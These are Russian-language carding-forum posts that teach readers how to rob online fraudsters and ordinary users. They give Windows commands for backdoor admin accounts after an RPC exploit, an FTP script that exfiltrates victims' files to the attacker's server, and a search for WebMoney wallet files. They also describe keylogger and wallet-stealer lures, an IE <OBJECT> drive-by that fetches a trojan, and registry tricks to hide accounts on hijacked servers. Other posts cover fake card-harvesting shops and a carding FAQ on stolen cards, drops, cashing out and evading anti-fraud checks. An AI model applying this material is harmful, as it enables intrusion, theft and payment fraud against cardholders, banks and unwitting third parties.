    Все люди зарабатывают себе на жизнь. Причем различными способами. Некоторые выбирают обогащение в виртуале. При этом сам заработок не всегда бывает честным. Человек рискует, проводит важные банковские операции, продает кредитки, покупает различные вещи… и в какой-то момент все теряет. Из-за собственной невнимательности его полностью обчищает хакер Вася из Мухосранска. Почему так происходит, и как взломщику удается напасть, на, казалось бы, защищенных кардеров? Давай попробуем разобраться.

    Укротим систему!

    Способов украсть ценную информацию и сбережения кардера очень много. Но стоит оговориться, что в этом деле главное не количество, а качество, то есть успешное применение этих способов.
    Итак, самое время рассказать, как же хакер может украсть данные у жертвы. Во-первых, это взлом компьютера богатого буратино ;). Здесь — как повезет, ничего нельзя сказать наверняка. Если человек — раззява и не читает багтраки, то шансы хакера резко возрастают. В противном случае, да еще и с установленным на машине фаерволом, этот способ непригоден.
    Как же ломают рабочие станции пользователей? Тут также существуют свои способы. Остановимся на бажной WinNT. Ты всегда думал, что если винда имеет префикс NT, то у нее стопроцентная защита? Я тебя разочарую. В таких платформах были найдены очень опасные баги.

    RPC-эпидемия

    Если ты не знаешь об RPC-уязвимости, то у тебя позднее зажигание ;). Об этой ошибке трубили все порталы по безопасности, а также было выпущено множество эксплоитов, в том числе и для Windows (рай для скрипткидисов). Как же хакер может поиметь бабла с наивного буржуя, который, наверное, и не знает о существовании патча от RPC-баги? Очень просто. Достаточно завладеть доступом к его системе и набрать ряд консольных команд. После этого все важные документы будут находиться в лапах злоумышленника.

    Я не буду тебя учить эксплуатировать уязвимость. Об этом писали различные хакерские порталы, а также Хакер #9. Я лишь заострю твое внимание на командах, которые могут пригодиться взломщику, захватившему права на системе жертвы.

    Чтобы не использовать шумный эксплоит (который, кстати, может разрушить RPC-вызовы и привести систему к краху) каждый раз, можно создать аккаунт администратора. Его, как известно, пустят на такие ресурсы, как C$, D$ и прочие. Это сделать очень легко. Достаточно лишь набрать следующие строки:

    net user admin nimda /add (добавляем нового пользователя admin с паролем nimda, параметры можно подставить свои).
    net localgroup Administrators admin /add (присвоим пользователю группу Administratots).

    В случае, когда локализация платформы не английская, необходимо подставить название группы на родном языке. Для этого хакер набирает «net user» и узнает истинное название группы.
    Если все было сделано верно (команда net обязательно сообщит хакеру о результате операции), взломщик может зайти на машину с локального компа. В этом ему помогает команда «net use z: \\IP-ADDRESS\C$». Но он этого никогда не сделает по одной простой причине — на машине ведутся логии, и его IP-адрес обязательно будет записан. Но выход есть — хакер заходит не с себя, а со своего любимого скарженного шелла.
    smbclient //IP-ADDRESS/$C -U admin

    Эта команда актуальна для Linux. После запроса пароля хакер попадает в системный ресурс $C (для того чтобы выполнить подобные действия, взломщик предварительно устанавливает на машину пакет samba).

    Но иногда простого доступа к директориям недостаточно. Например, в том случае, когда необходимо протроянить юзера или поставить на машину кейлоггер (а также просмотреть лист процессов, убить один из них и т.д. и т.п.). В этом случае взломщик либо вешает дополнительный бэкдор, либо использует эксплоит каждый раз.

    Кто ищет, тот всегда найдет

    В поиске информации нет ничего хитрого. Если хакер нетерпелив (а таких мало), он просто шарит по папкам и выкачивает файлы с подозрительными именами (типа 1111.doc или paroli.doc). Текстовики можно прочитать на месте командой «type file». Многие руководства по взлому винды пишут об обязательном аккаунте на каком-либо TFTP-сервере. Однако можно выполнить операцию через обычную команду ftp. Предварительно составляется сценарий, который состоит из простых операций, передаваемых ftp. Он может выглядеть, например, следующим образом:
    пример FTP-сценария
    user vasya vasya123
    type binary
    put document.doc /xakep/document.doc
    quit

    После составления (команды сценария последовательно записываются в файл с помощью echo и стандартного перенаправления ввода) скрипта, он передается консольной утилите с помощью параметра -s:имя_файла. Следует учитывать, что аутентификация была произведена в одной команде, поэтому добавляем к командной строке опцию -n.
    Следует отметить, что в винде нет команды поиска, которая присутствует в Linux. Но это совсем не означает, что найти файл в консоли невозможно. Предметом охоты для хакера являются кошельки WebMoney, которые имеют расширение kwm и pwm. Их можно найти следующей командой:
    dir /S c:\ | find *.?wm
    При этом будет выполняться рекурсивный вывод всех каталогов с диска c:\ и последующая фильтрация файлов с помощью команды find.

    WebMoney — радость хакера

    После того, как кошельки WebMoney будут скачаны, необходимо узнать идентификатор счета (это выполнит клиент), а также пароль на вход. Пароль на WebMoney не может быть изменен и задается всего один раз (аналог PIN-кода в кредитной карте), поэтому возможно, юзер записал его в файл, чтобы не забыть. При удачном стечении обстоятельств, хакер вытягивает этот файл и кошельки и полностью завладевает счетом жертвы. Внимание! Это очень опасно, поскольку система перевода денег имеет историю всех проведенных операций. Скажу по опыту, что у взломщиков есть свои люди, которые отмывают деньги на счете, беря за услуги некоторый процент от суммы.
    Существуют и другие способы добычи пароля. Например, такой: хакер сумел узнать несколько паролей, которые жертва использует в Сети. Он пробует перебрать их все и, возможно, один из них будет верным. Когда способов не остается, можно найти подходящий кейлоггер, шлющий клавиатурный дамп на вражеский e-mail адрес. После того как он будет запущен на компьютере, остается только ждать, пока пользователь не воспользуется клиентом WebMoney. Существует способ для ускорения этого процесса — отправка жертве письма, в котором будет говориться о том, что кошелек был пополнен на энную сумму. Тогда-то он обязательно запустит клиент.
    Вообще, есть еще один метод завладения WM-кошельком. Он практикуется среди богатых, но ламернутых личностей, которые недавно, но успешно постигают кардерские махинации. Создается программа, типа «крякера интернета», но она не крякает интернет, а уводит кошельки WebMoney. Реализовать ее — пара пустяков, проблема в другом — впарить прогу жертве. Это может сделать хороший хакер, имеющий богатый опыт в социальной инженерии.
    Исходный код этой небольшой программы ты найдешь во врезке. Полный исходник проекта есть на диске.
    Помимо самой службы WebMoney, есть сервис Merchant (http://merchant.webmoney.ru), который нужен для проведения онлайн-операций по переводу денег с одного WM-кошелька на другой. Обычно сервис применяется в различных проектах, например, интернет-магазинах. Если хакер взламывает подобный ресурс, он просто заменяет в исходном коде скрипта ссылку и параметры на свой кошелек WebMoney. При этом клиент будет пересылать деньги на счет злоумышленника. Бесспорно, это скоро будет замечено, но взломщик успеет обогатиться.

    Бреши в ослике

    RPC-уязвимость далеко не единственная бага в форточках. Рассмотрим еще один пример — ошибка в обработке тега <OBJECT>, позволяющая выполнять произвольный код на машине клиента. Реализовав такую уязвимость, хакеру ничего не стоит залить троян на жертву, да еще и записать в лог его IP-адрес, который впоследствии будет проверен на заражение бэкдором ;).
    Для написания эксплоита достаточно создать следующий html-документ:
    <object data=»/object.html»>Привет всем ;)</object>
    А в object.html положить скрипт, например на Visual Basic. В нем будет производиться выкачивание трояна по указанному адресу и его последующий запуск. При желании можно пофантазировать с записью бэкдора в реестр (если, конечно, в нем уже не реализована подобная функция), но это исключительно проблемы взломщика.
     
  9. Alterego

    Alterego ElusiveVBV ProMarket

    Регистрация:
    3/10/16
    Сообщения:
    27
    Симпатии:
    15
    Репутация:
    25
    Раскрутка ресурса

    Сделать псевдосайт — полдела, необходимо его еще и раскрутить. В противном случае твой ресурс запылится и не принесет никакой пользы. Для привлечения посетителей, конечно, все средства хороши, но не все эффективны. По-хорошему, если ты планируешь заколачивать на ресурсе приличные бабки, придется сначала потратиться на раскрутку.

    Прежде всего, учитывай, что твоя основная аудитория — иностранцы. Следовательно, реклама рассчитана на них. Скорее всего, сам ресурс придется сделать на английском языке, либо на русском и английском одновременно. Далее регистрируешь ресурс на поисковых серверах, при этом тебя интересуют как наши поисковики, так и забугорные. Никогда не заморачивайся с поиском полного списка поисковых серверов, достаточно знать один крупный (к примеру, www.yandex.ru или www.rambler.ru), а остальные находишь непосредственно через него.

    Часто эффективно проходит фокус с перенаправлением трафика с других порноресурсов. То есть создается порносервер, раскручивается в одиночку, а потом при помощи этого сервера раскручивают любые другие. Как именно это сделать — дело техники: перенаправлять часть заходов, подгружать параллельно или использовать ссылки-ловушки. При этом на раскручиваемом ресурсе ставятся счетчики рейтинговых систем, и он взлетает до небес. А там уже как лавина. Далее раскрученный ресурс, в свою очередь, можно использовать для раскрутки последующего.

    Некоторые умельцы специально заводят ресурсы, чтобы предлагать другим раскрутку за деньги. Ты же можешь найти подобные ресурсы на условиях взаимораскрутки. То есть на первых порах они раскручивают тебя, а в будущем вы будете обмениваться трафиком, взаимно увеличивая количество реальных посещений на своих сайтах.

    Другой эффективный способ привлечения потенциальных покупателей на свой псевдоресурс — баннерная реклама. При этом не обязательно выставлять код баннерной системы, можно выкупить показы на вторичном рынке, что порой очень выгодно. Вторичный рынок баннерных показов — по сути трафикогенерящие ресурсы, зарегистрированные в баннерных сетях. Часть показов они тратят на собственную раскрутку, а часть продают на так называемом вторичном рынке баннерных показов. Есть еще вариант продавать показы непосредственно баннерной сети, но цены будут ниже, плюс не все баннерные сети выкупают свои показы, либо выкупают только на определенных (чаще всего невыгодных) условиях.

    Для покупки баннерных показов на вторичном рынке тебе понадобится баннерная биржа, на которой ты сможешь определиться с ценами (средние по бирже) на те или иные баннерные сети и форматы баннеров, плюс выкупить необходимые показы, если они есть в наличии. Одна из популярных баннерных бирж — www.banstock.com. Там тебе и FAQ, и статистика по наиболее популярным (читай — пользующимся спросом) баннерным сетям и форматам, а когда-нибудь ты сможешь и сам продавать через нее баннерные показы другим начинающим ресурсам :).

    Хороший хостинг

    www.h1.ru — российский бесплатный хостинг, баннер хостера обязателен, PHP/CGI/mySQL/SSH, могут отключить за нарушение регламента

    www.rcdom.ru — PHP/CGI/mySQL

    www.webservis.ru — PHP/CGI, баннер хостера обязателен

    www.fatal.ru — PHP/CGI

    www.spaceports.com — PHP/CGI/mySQL, баннер на сайте необязателен

    www.webhosting.bootbox.net — PHP/CGI, без рекламы

    www.come.to — PHP/CGI, баннер хостера обязателен

    www.dot.tk — PHP/CGI, бесплатный домен второго уровня в зоне .tk

    www.cgi.ru — обширный каталог PHP/CGI-скриптов (как бесплатных, так и коммерческих),
    именно оттуда был скачан описываемый проект dcshop

    4wm.virtualave.net — большая коллекция CGI/C/C++ скриптов, все проекты в основном бесплатные

    getscripts.vov.ru — ресурс, посвященный CGI-скриптам

    www.cgi.agava.ru — русские CGI/PHP-скрипты в ассортименте

    Бесплатный движок

    При серьезном подходе к делу, псевдосайт может приносить кардеру умопомрачительные доходы.
    Чтобы построить псевдосайт, необходимо найти для него программное обеспечение — движок. Он состоит из отдельных html-страниц (формы для оплаты) и скриптов, которые обрабатывают вводимую информацию.

    На фриварных источниках валяется неплохой движок dcshop (http://kamensk.net.ru/forb/1/x/id1608.zip). Он организовывает универсальный интернет-магазин по продаже всякого хлама.
    Рекомендую закрыть доступ к директории с указанным файлом (для чего и нужна поддержка собственных .htaccess-файлов), потому что знающий чел сможет увидеть содержимое каталога, а следовательно, и файла с паролем.

    Нюанс — заливать надо в ASCII-режиме, иначе скрипты не будут работать. Осталась самая малость — поставь на все каталоги права 777, а на файлы .pl и .cgi — 755.
    Затем создай .htpasswd, в котором записывается аккаунт в виде пары login:password. Допустимые алгоритмы шифрования пароля: DES, MD5, SHA, а также Plain text. Кодировать пароли умеет утилита htpasswd, входящая в поставку Apache.

    При переезде тебе придется столкнуться с такой проблемой, как бэкап всех данных. Это необходимо сделать вовремя, когда почувствуешь, что дело пахнет керосином.
    Если ты прилично зарабатываешь, и решил создать псевдосайт только из любопытства, поразмысли на досуге, стоит ли тебе тратить свои нервы и деньги на противозаконную деятельность.

    1.Автоматически находить множество прокси
    (для этого есть такая прога называется Proxy Switcher! Скачать ее можно тут
    http://rutracker.org/forum/viewtopic.php?t=3516193
    выполняет полностью все функции заялвенные космосом)

    2.Сканировать интернет на наличие скрытых прокси
    эту же функцию выполняет эта же прога Proxy Switcher!

    3.Находить на дедиках ценные материалы, и суметь защищать свои
    Для этого есть програмка которая находит слова в тексте ! (например ищите СС? Вводите на дедике слово свзяаное с СС например CVV и если на дедике есть прога найдет!) скачать можно тут http://i-vd.org.ru/soft/find-txt.shtml Описание программы Folder Find Text и ещё один софт называется Everything — Программа для поиска файлов тут видео

    4.Уметь быть скрытным на дедике от администратора
    Во первых надо чистить дедик посел каждого входа и выхода… во вторых надо иметь Админку на дедике… дабы тебя от туда не выкинули)) в третьих надо спрятать свой профиль на дедике) как это сделать?
    Для WIN дедика заходишь в командную строку (cmd.exe) и пишешь:
    Убрать учетку из меню выбора пользователей:
    PHP код:
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v пользователь /t REG_DWORD /d "00000000" /f
    Еще разумно скрыть папку с файлами на учетке:
    attrib +h +s «C:\Documents and Settings\пользователь»
    где «пользователь» — имя твоей учетки (например, user).
    А также подробная инфа может быть описанна тут http://forum.hackersoft.ru/showthread.php?p=94873#post94873

    5.Получать роутеры с минимальными потерями траффика
    тут я бессилен т. к. я кардер и с трафиком такого рода дел не имел… да и мне не нужно… но все таки почитайте эту статью http://rutracker.org/forum/viewtopic.php?t=2953621

    6.Получать уязвимые сайты и превращать их в прокси с шифрованием
    на этот вопрос отвечает все таже прога proxy switcher http://rutracker.org/forum/viewtopic.php?t=3516193 вставляешь ссылку она сканит прокси и скосы… а вообще ребят на заметку прокси далеко уже не в теме и стоят они всего 1$ максимальная цена за хороший прокси… имхо ДОХНУТ они быстро!

    7.Защищать свой дедик и компьютер от взлома
    А теперь о компьютере ) есть такая веселая программка
    http://tech.pp.ru/trans/truecryptrus/ TureCrypt) также в мануале о шифровании есть статьи про эту прогу !

    8.Создать свой прокси сервис, или выгодно продать свою базу селлерам прокси и дедиков
    как я уже и говорил прокси быстро дохнут и жить им от 20 минут до 12 часов) а дедик - это определенная тема… http://rghost.ru/47626356 пароль 648968874 тут есть не только софт как достать дедики но и свой собственный онлайн шоп по дедикам! Таким образом вы можете добывать дедики и раскрутить свой шоп и продавать дедики ОНЛАЙН!

    Механизм работы платежных систем

    Кредитная карта, в первую очередь, является внешней частью твоего банковского счета. Работу кредитной системы обеспечивают: платежная система, банки, производители; простая покупка по кредитке представляет собой довольно сложный механизм. Об этом и многом другом я сегодня расскажу.

    Механизм оплаты

    Почти любая финансовая операции при использовании кредитки начинается с авторизации. Во время этого этапа необходимо определить, есть ли у тебя на счете необходимые средства и можешь ли ты ими воспользоваться. Авторизация может проводиться любым доступным способом. Решение об авторизации может принять сама карта (в случае карты с микросхемой) – это метод называется off-line, т.е. связываться ни с кем не надо. В противном случае необходимо запросить подтверждение у банка: запрос отправляется в первую очередь эквайреру (в процессинговый центр), затем пересылается эмитенту, который принимает решение, ответ перенаправляется снова эквайреру и только потом возвращается на место запроса (такой метод называется on-line). Это процесс может проходить через сеть, или продавец может просто спросить – голосом или по факсу.
    Если авторизация подтверждена, то дальше ты можешь в полной мере распоряжаться зарезервированной суммой. Если ответ на запрос не пришел, то – извини. И это еще не худший вариант — в ответ может прийти приказ продавцу изъять у тебя карту (например, если они числится потерянной или украденной). Поэтому авторизация является ключевым этапом сделки. В редких случаях авторизации может и не быть, подробнее об этом ниже.

    Сумма, на которую запрашивалась авторизация, на твоем счету замораживается, даже если ты вдруг передумаешь делать покупку. По завершении авторизации и через небольшой промежуток времени банк приступает к переводу средств на счет продавца. То есть — ты уже ушел из магазина, забрав покупки, а продавец все еще ждет свои деньги. Для начала эмитент отправляет запрос на перевод зарезервированных средств расчетному банку, который доставит их счет эквайрера, который уже, в свою очередь, перенаправит их туда, где ты совершил покупку. За перевод средств эквайрер оставит себе небольшой процент от суммы, за срочность процент будет больше. В общей сложности продавцу придется ждать денег от нескольких часов до нескольких дней. За это многие магазины не любят обслуживать креды.
    Вся совокупность финансовых операций по кредам от начала до конца называется взаимообменом (или interchange).

    Что нам может дать банк

    С банковской точки зрения креды можно разделить на три основных класса. Это важно, так как этим определяется, каким образом ты сможешь распоряжаться своими деньгами или брать в кредит.

    1. Дебетовые (расчетные) карты – ты можешь использовать только те средства, которые досрочно положил на свой счет. Такую креду получить проще всего, и стоит она дешевле остальных (иногда их даже выдают бесплатно). Никакой кредит или перерасход средств по расчетной карте не предусмотрен. Кстати, дебетовые карты являются самыми распространенными.

    2. Кредитные карты – служат для получения определенного (заранее оговоренного) кредита под определенный процент на определенный срок. К сожалению, процент довольно велик – от 10 до 40% годовых для России. На счет карты деньги вносить не нужно. Соответственно, чем больший кредит дается по карте, тем ее сложнее получить и тем она элитнее (сумма кредита может доходить до нескольких десятков тысяч баксов). Для заключения контракта необходимо, помимо основных документов, представить справку о твоих ежемесячных доходах.

    3. Овердрафтные карты (почти то же самое, что кредитно-дебетовая карта) – расчетные карты с кредитным лимитом. Можно класть деньги на счет и выполнять определенный перерасход. Кредит дается обычно на срок от одного до трех месяцев, но чем дольше у тебя остается долг, тем больший ты должен будешь выплатить процент. ИМХО, такие карты самые удобные.
    По привычке и дебетовые, и овердрафтные, и кредитные карты называют просто кредитными (кредитками/кредами), что, как видишь, не совсем верно.

    Кстати, самую первую свою кредитку можно приобрести уже с 14 лет.
     
  10. Alterego

    Alterego ElusiveVBV ProMarket

    Регистрация:
    3/10/16
    Сообщения:
    27
    Симпатии:
    15
    Репутация:
    25
    В принципе, продавцу/банкомату абсолютно неважно, по какой карте ты расплачиваешься (твои это средства или кредит), они даже не знают, сколько денег у тебя на счету. Но в некоторых местах дебетовые креды не принимают, в отличие от кредитных или кредитно-дебетовых (в чем одно из их преимуществ).
    Кстати, по кредитным или овердрафтным картам очень часто кидают банк. Порой банку практически невозможно законно вернуть себе весь кредит даже через суд, если клиент отказывается возвращать деньги (тут, по решению суда, они могут только вычитать некоторый процент из официальной (!) зарплаты должника). Поэтому в России долгое время рядовым клиентам предоставлялись исключительно дебетовые карты (даже если карта была кредитной по определению). Лишь в последние несколько лет стало реальным купить полноценную кредитную карту.
    Еще очень важную роль играет такой показатель, как лимит суммы, на которую ты можешь совершить покупку без авторизации (наличие средств на креде не проверяется, а банку-эмитенту просто направляется платежное поручение на данную сумму). К сожалению, такая сумма сравнительно мала (около $50). Вот еще один из способов обуть банк, можно даже по пустой или левой креде. Хотя, по большому счету, банку твои 50 баксов как капля в море (сильно ты их не расстроишь). В России такая система мало распространена, а жаль.

    Платежные системы

    Всевозможных платежных систем в мире несчетное количество — в каждой стране своя и чаще всего не одна, есть также и международные системы. Кстати, к платежным системам относятся не только банковские, но еще и системы путешествий и развлечений – так называемыеT&E (Travel & Entertainment), например, American Express и Dinners Club. Из международных систем выделяются всего несколько крупнейших: Visa, Eurocard/MasterCard, American Express (AmEx) & Dinners Club International (DCI). Также можно отметить самые масштабные системы в России: Union Card, STB и Золотая корона (правда, преимущества этих систем очень сомнительны из-за их малой распространенности). Кстати, в России, в отличие от других стран, для того, чтобы стать эмитентом, необходима специальная лицензия Центробанка.

    Бесспорно, самая популярная система в мире – Visa.
    Эта система применяется примерно в 20000 банках в 72 странах мира, про количество пользователей говорить не имеет смысла — с каждым днем их число неуклонно растет.

    Вторая по величине система Europay International.

    Она объединяет в себе сразу две крупных подсистемы: Eurocard/MasterCard и Cirrus/Maestro.

    Теперь немного про составляющие платежной системы. За функционирование системы отвечают несколько участников (точнее, видов участников). Это эмитенты, эквайреры и расчетные банки. Каждый из участников должен четко выполнять свои функции. Эквайрер – банк, который обслуживает все необходимые финансовые сделки по кредам. Эмитент – сама организация, которая выпустила креду. Расчетные банки играют роль регуляторов между всеми участниками сделки (следят за переводом денежных средств и прочее). Нужно отметить, что за это отвечают не обязательно разные банки – все эти функции может выполнять один-единственный банк.

    Классы карт

    Каждая платежная система выпускает несколько видов кред, чтобы любой смог выбрать кредитку, нужную именно ему. Класс карты определяет почти все ее характеристики (остальные определяет банк). Обычно выпускаются креды электронного (для банкоматов и терминалов), экономичного, стандартного и элитного класса. Чем дороже карта, тем больше у нее преимуществ: большой лимит кредита, принимается в большем количестве мест, ты получаешь множество всяких скидок, подарков и прочего, плюс, конечно, великолепный сервис.

    Visa предлагает на выбор кредитки Electron, Classic, Gold, Platinum и несколько других, более редких. Я расположил креды в порядке их стоимости. За годовое обслуживание Visa Electron берут примерно 5 баксов, за Classic – 25, а за Gold – все 100. Visa Electron предназначена только для использования в банкоматах и электронных терминалах в магазинах. Classic и Gold – кредитки класса повыше, но для их использования необходимо, чтобы баланс твоего счета не опускался ниже определенной суммы: обычно $100 для Classic и $1000 для Gold (хотя иногда такое ограничение банками опускается). Различие между Classic и Gold довольно незначительно, отличаются они в основном большим количеством дополнительных фишек у последней. Это были дебетовые карточки. Visa Platinum – это уже овердрафтная карта. Стоит эта карта соответственно названию, и получить ее тяжело. Но за это ты получаешь кредитный лимит в $20000 и просто немыслимое количество всяких страховок, скидок и прочего и прочего.

    В системе Eurocard/MasterCard применяются аналогичные креды: Cirrus/Maestro, Mass, Gold. Все характеристики примерно те же, что и у Visa.

    Электронные карты

    Ни для кого не секрет, что по кредиткам можно расплачиваться и в инете. Все бы хорошо, но тут возникает большая проблема безопасности. Для оплаты покупки непосредственно в интернет-магазине приходится сообщать свои идентификационные данные, после этого их конфиденциальность оказывается под угрозой. Для того чтобы обезопасить все финансовые операции через Сеть, созданы специальные платежные подсистемы. Таких систем в инете очень много, пожалуй, самая известная в России – WebMoney, но она не ориентируется на работу с кредитками, поэтому WebMoney я рассматривать не буду. Прочие популярные системы: CyberPlat, ASSIST, PayCash, RBS и ЭлИТ. Принцип функционирования этих систем примерно одинаков – они являются посредниками между тобой, банком и интернет-магазином. Конечно, за свои услуги они оставляют себе некоторый процент от суммы сделки, но зато гарантируют сохранность твоих средств и конфиденциальность данных. Почти все эти системы обеспечивают работу с картами международных платежных систем Visa, Eurocard/Mastercard, American Express и Dinners Club, а также иногда обслуживают и креды российских платежных систем.

    Безопасность сделки может обеспечиваться следующими способами: инет-магазин не получает твоих идентификационный сведений (они хранятся только у платежной подсистемы); канал передачи данных защищается при помощи SSL; используется цифровая подпись; гарантируется юридическая чистота обеих сторон; используются особые сертификаты SET; полная выписка счета обо всех проведенных финансовых операциях. Такая схема удобна и продавцам, и покупателям, которым не жалко отдать какую-то сумму за безопасность. Есть у таких систем и свои минусы: например, можно работать только с магазином, зарегистрированным в данной сети. Также иногда для работы необходимо поставить фирменную программу.

    Итого

    Вот, собственно, и все, что я хотел рассказать про роль и функции кредиток в финансовой системе. На тему кредиток пишут диссертации, создают целые порталы в Сети, пишут огромные документации.

    Сам понимаешь, весь этот материал просто невозможно было охватить, но я постарался описать все самое существенное и примечательное.

    Словарь

    Аверс – лицевая сторона кредитки

    Импринтер – девайс у продавца, делающий отпечаток эмбоссированных данных на чек

    Картридер – устройство для чтения данных с карты

    Расчетный банк – банк, регулирующий финансовые операции между участниками сделки

    Реверс – оборотная сторона креды

    Типпинг – процесс оттиска эмбоссированных данных на чек

    Эквайрер – банк, входящий в платежную систему и обслуживающий все финансовые операции по кредам

    Эмбоссинг – процесс выдавливания (тиснение) текста на поверхности кредитки, таким образом выдавливают номер креды/дату окончания ее действия/кард-холдерс-нейм и прочее (отсюда название карт — эмбоссированные)

    Эмитент – организация, выпустившая карточку


    Сумма, на которую запрашивалась авторизация, на твоем счету замораживается, даже если ты вдруг передумаешь делать покупку. По завершении авторизации и через небольшой промежуток времени банк приступает к переводу средств на счет продавца.

    Для заключения контракта необходимо, помимо основных документов, представить справку о твоих ежемесячных доходах.

    Безопасность сделки может обеспечиваться следующими способами: инет-магазин не получает твоих идентификационный сведений (они хранятся только у платежной подсистемы); канал передачи данных защищается при помощи SSL.

    Q: Что такое креды, CC, картон и где их достать?

    A: Это и есть кредитные карты, именно благодаря им существуем мы.
    Способов достать CC много — от банальной кражи до взлома интернет магазина, но на данном этапе я бы посоветовал вам незаморачиваться и просто купить их у известных людей на данном форуме.


    Q: Я новичек в кардинге. В какой теме лучше начать работать?

    A: Если вообще ноль в кардинге, то мой тебе совет начинать с вбива, для того чтобы хоть немного получить представление о кардинге. Прочти все статьи в этом разделе — это поможет тебе составить хоть какое-то представление о нашем деле.
    Настрой машину для вбива, обеспечь себе безопасность и ищи работодателя.


    Q: Кто такой вбивальшик?

    A: Это человек который занимается вбивом информации по кредитной карте в какой нибудь магазин, от него во много зависит удачный исход всей операции. Подробнее о том что это такое вы можете узнать здесь.

    Q: Примерно сколько получает вбивальщик за свою работу?

    A: Ну это все зависет от того как вы договаритесь со своим работадателем, чей будет расходный материал (карты, прокси и т.д.) и какова сложность работы. В среднем за вбив платят от $2 до $5.

    Q: Что такое эмитет?

    A: Это банк который выпустил саму кредитную карту, узнать название банка который эмитировал карту можно с помощью программы CC2Bank

    Q: Что такое бин?

    A: Бин это первые 4 или 6 символов в номере кредитной карты, именно по нему и узнают что за банк эмитирует кредитную карту, а также тип карты.

    Q: Что такое CVV/CVV2 код?


    A: Это 3-4 дополнительные цифры, призванные улучшить защиту кредитных карт, в данный момент очень тяжело найти места где бы принимали карты без CVV.

    Q: Как выглядит информация по кредитной карте?

    A: Подробнее об этом вы можете узнать Здесь

    Q: Что такое карты с Full Info и зачем они нужны?


    A: Это информация по кредитной карте включающая в себя по мимо стандартных данных еще и SSN, DOB, PIN, MMN и т.д. Такая информация нужна в тех случаях когда требуются более полные данные по держателю карты (например при энроле) или обнале.
    DOB — Date of birth
    SSN — Social Security Number
    MMN — Mothers Maiden Name
    Некоторые фулки включают в себя PIN => они же дампы.
    Для обнала такой карты тебе нужны след. данные cc# ,exp, PIN,определённый бин по которому налят (т.е. если у карты нет track2,чтобы генераторщик смог пробить его по определённым бинам) и естественно опытный нальщик.

    Q: Кто такой дроп?

    A: Это человек принимающий на своё имя какой либо скарженый тобой товар, после чего он пересылает его тебе или другому дропу (вообще тут бывают разные варианты). Чаще всего дропы не знают что они принимают украденные вещи и рано или поздно за ними придут копы.

    Q: Я снял с карты около $50-$100 станут ли меня искать за эти деньги?

    A: По идеи конечно вас должны будут искать, но на практике это бессмыслено, т.к. ваши поиски выльются в более крупные суммы.

    Q: Что такое PayPal или палка?

    A: Очень популярна онлайновая система оплаты различных услуг в USA, имеется возможность пополнения аккаунта с помощью кредитной карты.

    Q: Вы не могли бы подсказать шопы которые 100% шлют товар?


    A: Нет, это информация представляет собой определённую ценность и просто так вам никто не подскажет шоп который 100% шлёт товар.

    Q: Что такое tracking number или трэк?


    A: После того как ты заказал в шопе товар его высылают на дропа с помощью почты или курьерской службы. Самые известные из этих служб UPS, FedEx, AirBorne и т.д. Так вот после того как товар будет выслан тебе выдаётся этот самый трэк, с помощью которого на сайте курьерской службы ты и можешь узнать где в данный момент находится посылка.

    Q: Как мне перевести деньги с кредитной карты на WM?

    A: Никаких способов напрямую перевести деньги с кредитной карты на WebMoney несуществует.

    Q: Что такое фрауд?

    A: В переводе с английского «мошенничество», в принципе перевод полностью отображает значение этого термина.

    Q: Что такое антифрод и как его обойти?


    A: Это система защиты от мошенничества — различные дополнительные проверки.
    Как обойти — будь полностью как амер, во всех ипостасях, и будет всё ок.
    Иногда проще забить на шоп с сильной системой антифрода, чем пытаться ее обойти.
     
  11. Alterego

    Alterego ElusiveVBV ProMarket

    Регистрация:
    3/10/16
    Сообщения:
    27
    Симпатии:
    15
    Репутация:
    25
    Credit line — сумма кредита, которую банк дает (доверяет) на траты и покупки сейчас и которую клиент сможет погасить потом.

    Current Balance — сколько потратил, столько потом придется возвращать банку.
    А из Credit line вычитается

    Available Credit — сколько еще можно потратить.
    Карта или точнее кредит выдается на год или несколько лет. Поэтому на карте пишется

    Expiration date — месяц и год, когда договор с банком закончится. Например 06/2006.
    Каждая карта уникальна. Для поддержания этой уникальности на них пишут

    Card Number — число, чаще всего 16-ти значное. Реже встречаются 13-ти значные. У American Express по умолчанию 15-ти значное.
    Следят и ухаживают за всей этой махиной расчетов по кредитным картам

    Visa и Mastercard/Eurocard — международные платежные системы (МПС). У Визы номера карт начинаются на 4, у Мастеркард на 5. Остальные брэнды не так развиты и дальше собственной страны можно сказать не лезут (American Express, Discover, JCB, Золотая Корона и др.)
    Бывает, что карты роняют, но не нагибаются за ними, т.к. издали она похожа на кусок мыла, и идут дальше. А поскольку при покупках на большие суммы частенько спрашивают документ, удостоверяющий личность, то для того чтобы внимательные уборщики не могли отовариваться за чужой счет, на лицевой стороне карты пишут

    Cardholder’s Name — имя и фамилия держателя карты. (Карта — собственность банка. Клиенту она выдается только поносить с собой, т.е. быть этим самым держателем.)
    А чтобы обладатели фотографической памяти, увидев все реквизиты карты в руках владельца, не могли потом ничего купить по телефону или в онлайне по чужой карте, на ее обратной стороне пишется

    CVC2 или CVV2 — три секретных цифры мелким шрифтом. У Мастеркарда это называется Card Validation Code, у Визы — Card Verification Value.
    Чтобы кардхолдер знал сколько он потратил или внес на счет, банк высылает ему

    Statement — ежемесячный детализированый отчет обо всех движениях денег на карте, где построчно указаны стоимость кольта, услуг юриста, налога на развлечения и т.д.


    Там имеются такие важные для банка и нелюбимые кардхолдерами поля как

    Minimum Payment Due — сумма ежемесячного платежа, вычисляемая и пересчитываемая каждый месяц цифра, не менее которой клиент должен вернуть банку за потраченое. Общая сумма долга делится на оставшиеся месяцы до конца договора, накручиваются проценты и все это клиент оплачивает понемножку каждый месяц вместо того чтобы вывалить мешок килобаксов на стол в конце срока. Да и надежней, не сбежит с деньгами и не умрет не вовремя.

    Payment Due Date — не позже этого числа каждый месяц кардхолдер и оплачивает свой Minimum

    Payment Due иначе банк накрутит еще

    LATE FEE — посуточный штраф за опоздание платежа.

    Из лимитов в стейтменте можно еще увидеть

    Cash Advance Limit — такую максимальную сумму можно получить по карте деньгами в банкомате всего (не за один раз). Единоразовый, а точнее суточный лимит по CA чаще всего бывает $500. Но в разных банках он может быть больше или меньше.

    Термины в разных банках могут отличаться от вышеприеденных, но надеюсь, суть понятна, чтобы не путать баланс к оплате с лимитом на растраты. Основная путаница возникает из за принципиально иного типа карт — дебетовых. Вот там да, сколько положил на счет, столько и можешь потратить, т.е. баланс в прямом понимании.

    ———————— Слэнг ———————

    billing address, биллинг — адрес проживания, куда отправляется Statement.

    billing phone — телефон холдера, по которому звонит банк или шоп в случае каких нибудь неувязок.

